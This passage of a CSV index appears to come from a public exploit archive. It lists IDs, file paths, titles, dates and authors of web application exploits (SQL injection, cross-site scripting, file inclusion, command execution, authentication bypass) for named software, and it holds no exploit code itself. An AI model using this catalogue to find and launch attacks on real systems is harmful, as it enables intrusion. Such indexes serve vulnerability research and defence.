SA",php,webapps, -21148,exploits/php/webapps/21148.txt,"Pinterest Clone Script - Multiple Vulnerabilities",2012-09-08,DaOne,php,webapps, -21157,exploits/php/webapps/21157.txt,"bharat Mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",php,webapps, -21165,exploits/php/webapps/21165.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - 'user.php?uname' Cross-Site Scripting",2001-12-03,"Cabezon Aurélien",php,webapps, -21166,exploits/php/webapps/21166.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2001-12-03,"Cabezon Aurélien",php,webapps, -21168,exploits/php/webapps/21168.txt,"EasyNews 1.5 - NewsDatabase/Template Modification",2001-12-01,"markus arndt",php,webapps, -21184,exploits/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 - Debug Mode Cross-Site Scripting",2001-12-17,"Tamer Sahin",cgi,webapps, -21187,exploits/cgi/webapps/21187.txt,"Aktivate 1.0 3 - Shopping Cart Cross-Site Scripting",2001-12-18,"Tamer Sahin",cgi,webapps, -21521,exploits/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 - Arbitrary Command Execution",2012-09-25,LiquidWorm,php,webapps, -21206,exploits/php/webapps/21206.txt,"PHP-Nuke AddOn PHPToNuke.php 1.0 - Cross-Site Scripting",2002-01-06,frog,php,webapps, -21208,exploits/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps, -21209,exploits/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps, -21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps, -21221,exploits/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection",2012-09-10,Yarolinux,php,webapps, -21222,exploits/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,php,webapps, -21230,exploits/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",php,webapps, -21233,exploits/php/webapps/21233.txt,"PHP-Nuke 4.x/5.x - SQL_Debug Information Disclosure",2002-01-18,zataz.com,php,webapps, -21241,exploits/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Inclusion",2002-01-02,"Scott Moonen",php,webapps, -21250,exploits/php/webapps/21250.txt,"Webify Blog - Arbitrary File Deletion",2012-09-11,JIKO,php,webapps, -21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,php,webapps, -21257,exploits/cgi/webapps/21257.txt,"AHG Search Engine 1.0 - 'search.cgi' Arbitrary Command Execution",2002-01-29,"Aleksey Sintsov",cgi,webapps, -21267,exploits/php/webapps/21267.txt,"Subrion CMS 2.2.1 - Cross-Site Request Forgery (Add Admin)",2012-09-12,LiquidWorm,php,webapps, -21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps, -21270,exploits/php/webapps/21270.txt,"Webify Business Directory - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps, -21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps, -21272,exploits/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.00 - SQL Injection",2012-09-12,Vulnerability-Lab,asp,webapps, -21273,exploits/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",php,webapps, -21277,exploits/php/webapps/21277.txt,"Portix-PHP 0.4 - 'index.php' Directory Traversal",2002-02-04,frog,php,webapps, -21278,exploits/php/webapps/21278.txt,"Portix-PHP 0.4 - 'view.php' Directory Traversal",2002-02-04,frog,php,webapps, -21279,exploits/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,php,webapps, -40416,exploits/php/webapps/40416.txt,"Matrimonial Website Script 1.0.2 - SQL Injection",2016-09-22,N4TuraL,php,webapps,80 -21299,exploits/php/webapps/21299.txt,"Powie PForum 1.1x - 'Username' Cross-Site Scripting",2002-02-22,"Jens Liebchen",php,webapps, -21300,exploits/php/webapps/21300.txt,"XMB Forum 1.6 pre-beta - Image Tag Script Injection",2002-02-22,skizzik,php,webapps, -21301,exploits/php/webapps/21301.txt,"OpenBB 1.0.x - Image Tag Cross-Agent Scripting",2002-02-25,skizzik,php,webapps, -21304,exploits/php/webapps/21304.txt,"IkonBoard 2.17/3.0/3.1 - Image Tag Cross-Agent Scripting",2002-02-26,godminus,php,webapps, -21308,exploits/asp/webapps/21308.txt,"Snitz Forums 2000 3.0/3.1/3.3 - Image Tag Cross-Agent Scripting",2002-02-27,Justin,asp,webapps, -21312,exploits/php/webapps/21312.txt,"ReBB 1.0 - Image Tag Cross-Agent Scripting",2002-03-04,skizzik,php,webapps, -21317,exploits/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps, -21319,exploits/aix/webapps/21319.txt,"Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2012-09-14,modpr0be,aix,webapps, -22073,exploits/php/webapps/22073.txt,"APBoard 2.0 2 - Unauthorized Thread Reading",2002-12-06,"DNA ESC",php,webapps, -21324,exploits/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps, -21327,exploits/php/webapps/21327.txt,"webERP 4.08.4 - 'WorkOrderEntry.php' SQL Injection",2012-09-17,modpr0be,php,webapps, -21329,exploits/php/webapps/21329.txt,"Auxilium PetRatePro - Multiple Vulnerabilities",2012-09-17,DaOne,php,webapps, -21330,exploits/php/webapps/21330.txt,"Netsweeper WebAdmin Portal - Multiple Vulnerabilities",2012-09-17,"Jacob Holcomb",php,webapps, -21343,exploits/php/webapps/21343.txt,"PHProjekt 3.1 - Remote File Inclusion",2002-03-13,b0iler,php,webapps, -21349,exploits/php/webapps/21349.txt,"PHP-Nuke 5.x - Error Message Web Root Disclosure",2002-03-21,godminus,php,webapps, -21352,exploits/cgi/webapps/21352.txt,"DCShop Beta 1.0 - Form Manipulation",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps, -21357,exploits/php/webapps/21357.txt,"PostNuke 0.703 - caselist Arbitrary Module Include",2002-03-28,"pokleyzz sakamaniaka",php,webapps, -21358,exploits/php/webapps/21358.sh,"SquirrelMail 1.2.x - Theme Remote Command Execution",2002-03-28,"pokleyzz sakamaniaka",php,webapps, -21374,exploits/cgi/webapps/21374.txt,"IBM Informix Web Datablade 4.1x - Page Request SQL Injection",2002-04-11,"Simon Lodal",cgi,webapps, -21377,exploits/php/webapps/21377.txt,"SunShop Shopping Cart 1.5/2.x - User-Embedded Scripting",2002-04-13,ppp-design,php,webapps, -21380,exploits/php/webapps/21380.php,"Burning Board 1.1.1 - 'URL' Manipulation",2002-04-15,SeazoN,php,webapps, -21381,exploits/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,php,webapps, -21382,exploits/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation",2002-04-14,Firehack,php,webapps, -21383,exploits/php/webapps/21383.txt,"xNewsletter 1.0 - Form Field Input Validation",2002-04-14,Firehack,php,webapps, -21391,exploits/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content Manipulation",2002-04-18,"Daniel Nyström",php,webapps, -21392,exploits/windows/webapps/21392.txt,"SpiceWorks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps, -21393,exploits/php/webapps/21393.txt,"WordPress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps, -21394,exploits/windows/webapps/21394.txt,"SonicWALL email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps, -21395,exploits/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,hardware,webapps, -21396,exploits/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps, -21397,exploits/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",php,webapps, -21399,exploits/php/webapps/21399.txt,"IcrediBB 1.1 - Script Injection",2002-04-19,"Daniel Nyström",php,webapps, -21400,exploits/asp/webapps/21400.txt,"Snitz Forums 2000 3.x - 'members.asp' SQL Injection",2002-04-19,acemi,asp,webapps, -21401,exploits/php/webapps/21401.txt,"PostBoard 2.0 - BBCode IMG Tag Script Injection",2002-04-19,gcsb,php,webapps, -21403,exploits/php/webapps/21403.txt,"PostBoard 2.0 - Topic Title Script Execution",2002-04-19,gcsb,php,webapps, -21405,exploits/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting",2002-04-20,BrainRawt,cgi,webapps, -21406,exploits/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps, -21411,exploits/cgi/webapps/21411.txt,"vqServer 1.9.x - CGI Demo Program Script Injection",2002-04-21,"Matthew Murphy",cgi,webapps, -21417,exploits/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem - Authentication Bypass",2012-09-20,"Glafkos Charalambous",hardware,webapps, -21418,exploits/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion",2012-09-20,L0n3ly-H34rT,php,webapps, -21421,exploits/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Authentication Bypass",2002-04-25,"Ulf Harnhammar",php,webapps, -21423,exploits/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection",2002-04-25,frog,php,webapps, -21424,exploits/php/webapps/21424.txt,"ADManager 1.1 - Content Manipulation",2002-04-17,frog,php,webapps, -21425,exploits/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass",2002-04-28,ppp-design,php,webapps, -21426,exploits/php/webapps/21426.txt,"Blahz-DNS 0.2 - Direct Script Call Authentication Bypass",2002-04-28,ppp-design,php,webapps, -21427,exploits/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,php,webapps, -22216,exploits/php/webapps/22216.txt,"Bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps, -21433,exploits/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,cgi,webapps, -21434,exploits/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query Manipulation Password",2002-05-02,anonymous,asp,webapps, -21435,exploits/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher - Cross-Site Scripting",2002-05-05,frog,cgi,webapps, -21436,exploits/php/webapps/21436.txt,"B2 0.6 - 'b2edit.showposts.php?b2inc' Remote File Inclusion",2002-05-06,Frank,php,webapps, -21447,exploits/php/webapps/21447.txt,"XMB Forum 1.6 - Magic Lantern Cross-Site Scripting",2002-05-11,frog,php,webapps, -21448,exploits/php/webapps/21448.txt,"XMB Forum 1.6 - Magic Lantern Log File",2002-05-11,frog,php,webapps, -21449,exploits/php/webapps/21449.txt,"NOCC 0.9.x - Webmail Script Injection",2002-05-14,ppp-design,php,webapps, -21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,php,webapps, -21455,exploits/asp/webapps/21455.txt,"Hosting Controller 1.x - DSNManager Directory Traversal",2002-05-17,hdlkha,asp,webapps, -21457,exploits/asp/webapps/21457.txt,"Hosting Controller 1.4 - Import Root Directory Command Execution",2002-05-17,hdlkha,asp,webapps, -21459,exploits/php/webapps/21459.txt,"Phorum 3.3.2a - Remote Command Execution",2002-05-17,"markus arndt",php,webapps, -21460,exploits/cgi/webapps/21460.pl,"CGIScript.net 1.0 - Information Disclosure",2002-05-17,"Steve Gustin",cgi,webapps, -21461,exploits/php/webapps/21461.txt,"Phorum 3.3.2 - Cross-Site Scripting",2002-05-18,"markus arndt",php,webapps, -21463,exploits/php/webapps/21463.txt,"mcNews 1.x - File Disclosure",2002-05-17,frog,php,webapps, -21464,exploits/asp/webapps/21464.txt,"Hosting Controller 1.x - 'Browse.asp' File Disclosure",2002-05-19,"Bao Dai Nhan",asp,webapps, -21473,exploits/cgi/webapps/21473.txt,"ViewCVS 0.9.2 - Cross-Site Scripting",2002-05-24,office,cgi,webapps, -21474,exploits/php/webapps/21474.txt,"OpenBB 1.0.0 RC3 - BBCode Cross Agent HTML Injection",2002-05-24,frog,php,webapps, -21478,exploits/php/webapps/21478.txt,"OpenBB 1.0 - Unauthorized Moderator Access",2002-05-24,frog,php,webapps, -21479,exploits/php/webapps/21479.txt,"OpenBB 1.0.0 RC3 - Cross-Site Scripting",2002-05-24,frog,php,webapps, -21480,exploits/cgi/webapps/21480.txt,"GNU Mailman 2.0.x - Admin Login Cross-Site Scripting",2002-05-20,office,cgi,webapps, -21486,exploits/php/webapps/21486.txt,"PHPBB2 - Image Tag HTML Injection",2002-05-26,"Martijn Boerwinkel",php,webapps, -21487,exploits/cgi/webapps/21487.pl,"Image Display System 0.8.1 - Directory Existence Disclosure",2002-05-28,isox,cgi,webapps, -21493,exploits/cfm/webapps/21493.txt,"Gafware CFXImage 1.6.4/1.6.6 - ShowTemp File Disclosure",2002-05-29,"Richard Brain",cfm,webapps, -21494,exploits/cgi/webapps/21494.txt,"CGIScript.net - 'csPassword.cgi' 1.0 Information Disclosure",2002-05-30,"Steve Gustin",cgi,webapps, -21495,exploits/cgi/webapps/21495.txt,"CGIScript.net - 'csPassword.cgi' 1.0 HTAccess File Modification",2002-05-30,"Steve Gustin",cgi,webapps, -21509,exploits/php/webapps/21509.txt,"Teekai Tracking Online 1.0 - Cross-Site Scripting",2002-06-03,frog,php,webapps, -21514,exploits/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,php,webapps, -21517,exploits/php/webapps/21517.txt,"Voxel Dot Net CBms 0.x - Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps, -21519,exploits/php/webapps/21519.txt,"MyHelpDesk 20020509 - HTML Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps, -21524,exploits/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusions",2012-09-26,L0n3ly-H34rT,php,webapps, -21525,exploits/php/webapps/21525.txt,"Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",php,webapps, -21526,exploits/php/webapps/21526.txt,"MyHelpDesk 20020509 - Cross-Site Scripting",2002-06-10,"Ahmet Sabri ALPER",php,webapps, -21527,exploits/php/webapps/21527.txt,"MyHelpDesk 20020509 - SQL Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps, -21528,exploits/php/webapps/21528.txt,"Geeklog 1.3.5 - Calendar Event Form Script Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps, -21529,exploits/php/webapps/21529.txt,"W-Agora 4.1.x - Remote File Inclusion",2002-06-10,frog,php,webapps, -21532,exploits/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 - Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",cgi,webapps, -21533,exploits/cgi/webapps/21533.txt,"CGIScript.net csNews 1.0 - Header File Type Restriction Bypass",2002-06-11,"Steve Gustin",cgi,webapps, -21535,exploits/cgi/webapps/21535.txt,"MakeBook 2.2 - Form Field Input Validation",2002-06-12,b0iler,cgi,webapps, -21543,exploits/java/webapps/21543.txt,"Ruslan Communications Builder - Authentication Bypass",2002-06-13,"Alexander Korchagin",java,webapps, -21545,exploits/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - Cross-Site Request Forgery",2012-09-27,"Jacob Holcomb",jsp,webapps, -21546,exploits/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,windows,webapps, -21552,exploits/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,php,webapps, -21553,exploits/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 - Cross-Site Scripting",2002-06-14,windows-1256,cgi,webapps, -21557,exploits/php/webapps/21557.txt,"ZeroBoard 4.1 - PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,php,webapps, -21558,exploits/cgi/webapps/21558.txt,"My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps, -21562,exploits/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 - File Disclosure",2002-06-17,"Andrew Badr",java,webapps, -21563,exploits/php/webapps/21563.txt,"osCommerce 2.1 - Remote File Inclusion",2002-06-16,"Tim Vandermeerch",php,webapps, -21564,exploits/php/webapps/21564.txt,"PHP-Address 0.2 e - Remote File Inclusion",2002-06-17,"Tim Vandermeerch",php,webapps, -21567,exploits/cgi/webapps/21567.pl,"WebScripts WebBBS 4.x/5.0 - Remote Command Execution",2002-06-06,"NERF Security",cgi,webapps, -21570,exploits/php/webapps/21570.txt,"BasiliX Webmail 1.1 - Message Content Script Injection",2002-06-19,"Ulf Harnhammar",php,webapps, -21573,exploits/cgi/webapps/21573.txt,"YaBB 1 - Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,cgi,webapps, -21587,exploits/cgi/webapps/21587.txt,"BBC Education Betsie 1.5 - Parserl.pl Cross-Site Scripting",2002-07-01,"Mark Rowe",cgi,webapps, -21588,exploits/cgi/webapps/21588.txt,"BlackBoard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps, -21590,exploits/php/webapps/21590.txt,"phpAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps, -21609,exploits/cgi/webapps/21609.txt,"Fluid Dynamics Search Engine 2.0 - Cross-Site Scripting",2002-07-10,VALDEUX,cgi,webapps, -21610,exploits/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory and File Content Disclosure",2002-07-11,JWC,php,webapps, -21617,exploits/cgi/webapps/21617.txt,"IMHO Webmail 0.9x - Account Hijacking",2002-07-15,"Security Bugware",cgi,webapps, -21621,exploits/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps, -21622,exploits/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps, -21628,exploits/php/webapps/21628.txt,"Geeklog 1.3.5 - HTML Attribute Cross-Site Scripting",2002-07-19,"Ulf Harnhammar",php,webapps, -21640,exploits/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass",2002-07-24,pokley,php,webapps, -21646,exploits/php/webapps/21646.py,"WordPress Theme Archin 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps, -21658,exploits/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 - File Modification",2002-07-29,"Arek Suroboyo",cgi,webapps, -21659,exploits/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps, -21660,exploits/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",php,webapps, -21661,exploits/php/webapps/21661.txt,"dotProject 0.2.1 - User Cookie Authentication Bypass",2002-07-29,pokleyzz,php,webapps, -21665,exploits/php/webapps/21665.txt,"phptax 0.8 - Remote Code Execution",2012-10-02,"Jean Pascal Pereira",php,webapps, -21668,exploits/php/webapps/21668.txt,"ShoutBox 1.2 - 'Form' HTML Injection",2002-07-29,delusion,php,webapps, -40361,exploits/php/webapps/40361.py,"Cherry Music 0.35.1 - Arbitrary File Disclosure",2016-09-13,feedersec,php,webapps,80 -40364,exploits/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80 -40366,exploits/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",php,webapps,80 -40367,exploits/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -21676,exploits/php/webapps/21676.txt,"Bharat Mediratta Gallery 1.x - Remote File Inclusion",2002-08-01,PowerTech,php,webapps, -21679,exploits/cgi/webapps/21679.txt,"Dispair 0.1/0.2 - Remote Command Execution",2002-07-30,anonymous,cgi,webapps, -21702,exploits/asp/webapps/21702.txt,"Midicart ASP - Remote Customer Information Retrieval",2002-08-10,"Dimitri Sekhniashvili",asp,webapps, -21708,exploits/php/webapps/21708.txt,"Leszek Krupinski L-Forum 2.4 - Search Script SQL Injection",2002-08-14,"Matthew Murphy",php,webapps, -21715,exploits/php/webapps/21715.txt,"WordPress Plugin spider Calendar - Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps, -21716,exploits/php/webapps/21716.txt,"Omnistar Mailer 7.2 - Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,php,webapps, -21723,exploits/php/webapps/21723.txt,"Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 - File Disclosure",2002-08-19,"Ulf Harnhammar",php,webapps, -21724,exploits/php/webapps/21724.txt,"Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 - File Modification",2002-08-19,"Ulf Harnhammar",php,webapps, -21727,exploits/php/webapps/21727.txt,"Mantis 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution",2002-08-19,"Joao Gouveia",php,webapps, -21728,exploits/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail - Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",cgi,webapps, -21729,exploits/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps, -21730,exploits/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 - Full Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps, -21834,exploits/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - 'server_sync.php' Backdoor (Metasploit)",2012-10-10,Metasploit,php,webapps, -21740,exploits/php/webapps/21740.txt,"phpMyChat Plus 1.94 RC1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps, -21742,exploits/php/webapps/21742.txt,"Template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps, -21743,exploits/php/webapps/21743.txt,"phpMyBitTorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps, -21744,exploits/windows/webapps/21744.txt,"Novell Sentinel Log Manager 1.2.0.2 - Retention Policy",2012-10-04,"Piotr Chmylkowski",windows,webapps, -21745,exploits/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution",2002-08-22,"Jeroen Latour",php,webapps, -21755,exploits/php/webapps/21755.txt,"PHPReactor 1.2.7 - Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",php,webapps, -21766,exploits/asp/webapps/21766.txt,"FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injections",2002-08-31,"Matthew Murphy",asp,webapps, -21768,exploits/cgi/webapps/21768.txt,"Super Site Searcher - Remote Command Execution",2002-09-03,luca.ercoli,cgi,webapps, -21769,exploits/cgi/webapps/21769.txt,"Aestiva HTML/OS 2.4 - Cross-Site Scripting",2002-09-03,eax@3xT.org,cgi,webapps, -21776,exploits/php/webapps/21776.txt,"PHP 4.2.3 - Header Function Script Injection",2002-09-07,"Matthew Murphy",php,webapps, -21778,exploits/php/webapps/21778.txt,"phpGB 1.x - SQL Injection",2002-09-09,ppp-design,php,webapps, -21779,exploits/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection",2002-09-09,Cano2,php,webapps, -21780,exploits/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,php,webapps, -21783,exploits/php/webapps/21783.txt,"PHPGB 1.1/1.2 - PHP Code Injection",2002-09-09,ppp-design,php,webapps, -21786,exploits/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php?month' SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps, -21802,exploits/cgi/webapps/21802.txt,"Lycos HTMLGear - guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",cgi,webapps, -21809,exploits/php/webapps/21809.txt,"Web Help Desk by SolarWinds - Persistent Cross-Site Scripting",2012-10-08,loneferret,php,webapps, -21811,exploits/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-19,"DarC KonQuest",php,webapps, -21817,exploits/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 - Script Injection",2002-09-23,"Ulf Harnhammar",php,webapps, -21886,exploits/php/webapps/21886.txt,"Py-Membres 3.1 - 'index.php' Unauthorized Access",2002-10-02,frog,php,webapps, -21822,exploits/multiple/webapps/21822.txt,"Endpoint Protector 4.0.4.0 - Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,multiple,webapps, -21825,exploits/php/webapps/21825.txt,"phpWebSite 0.8.2 - PHP File Inclusion",2002-09-23,"Tim Vandermeersch",php,webapps, -21829,exploits/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps, -21835,exploits/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit)",2012-10-10,Metasploit,php,webapps, -21836,exploits/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload (Metasploit)",2012-10-10,Metasploit,linux,webapps, -21855,exploits/php/webapps/21855.txt,"PHP-Nuke 6.0/6.5 - Search Form Cross-Site Scripting",2002-09-24,"Mark Grimes",php,webapps, -21859,exploits/php/webapps/21859.txt,"PHP-Nuke 6.0 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps, -21860,exploits/php/webapps/21860.txt,"NPDS 4.8 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps, -21861,exploits/php/webapps/21861.txt,"DaCode 1.2 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps, -21862,exploits/php/webapps/21862.txt,"PHP-Nuke 6.0 - 'modules.php' SQL Injection",2002-09-25,"Pedro Inacio",php,webapps, -21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps, -21864,exploits/php/webapps/21864.txt,"phpWebSite 0.8.3 - News Message HTML Injection",2002-09-25,das@hush.com,php,webapps, -21866,exploits/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting",2012-10-10,loneferret,multiple,webapps, -21891,exploits/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps, -21873,exploits/php/webapps/21873.txt,"PostNuke 0.72 - 'modules.php' Cross-Site Scripting",2002-09-26,"Mark Grimes",php,webapps, -21874,exploits/php/webapps/21874.txt,"vBulletin 2.0.3 - 'calendar.php' Command Execution",2002-09-27,gosper,php,webapps, -21875,exploits/jsp/webapps/21875.txt,"Jetty 4.1 Servlet Engine - Cross-Site Scripting",2002-09-28,Skinnay,jsp,webapps, -21877,exploits/cgi/webapps/21877.txt,"EmuMail 5.0 - Web Root Full Path Disclosure",2002-09-29,FVS,cgi,webapps, -21878,exploits/cgi/webapps/21878.txt,"EmuMail 5.0 Email Form - Script Injection",2002-09-29,FVS,cgi,webapps, -21879,exploits/java/webapps/21879.txt,"Sun ONE Starter Kit 2.0 / ASTAware SearchDisc 3.1 - Search Engine Directory Traversal",2002-09-30,"ET LoWNOISE",java,webapps, -21890,exploits/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps, -21893,exploits/php/webapps/21893.php,"TightAuction 3.0 - Config.INC Information Disclosure",2002-10-02,frog,php,webapps, -21894,exploits/php/webapps/21894.txt,"Midicart PHP - Information Disclosure",2002-10-02,frog,php,webapps, -21895,exploits/cgi/webapps/21895.txt,"Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution",2002-10-02,"Matt Moore",cgi,webapps, -21896,exploits/php/webapps/21896.txt,"Midicart PHP - Arbitrary File Upload",2002-10-02,frog,php,webapps, -21899,exploits/php/webapps/21899.txt,"phpWebSite 0.8.3 - 'article.php' Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps, -21900,exploits/php/webapps/21900.txt,"MySimpleNews 1.0 - PHP Injection",2002-10-02,frog,php,webapps, -21901,exploits/php/webapps/21901.txt,"MySimpleNews 1.0 - Remote Readable Administrator Password",2002-10-02,frog,php,webapps, -21903,exploits/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module - Cross-Site Scripting",2002-10-03,Pistone,php,webapps, 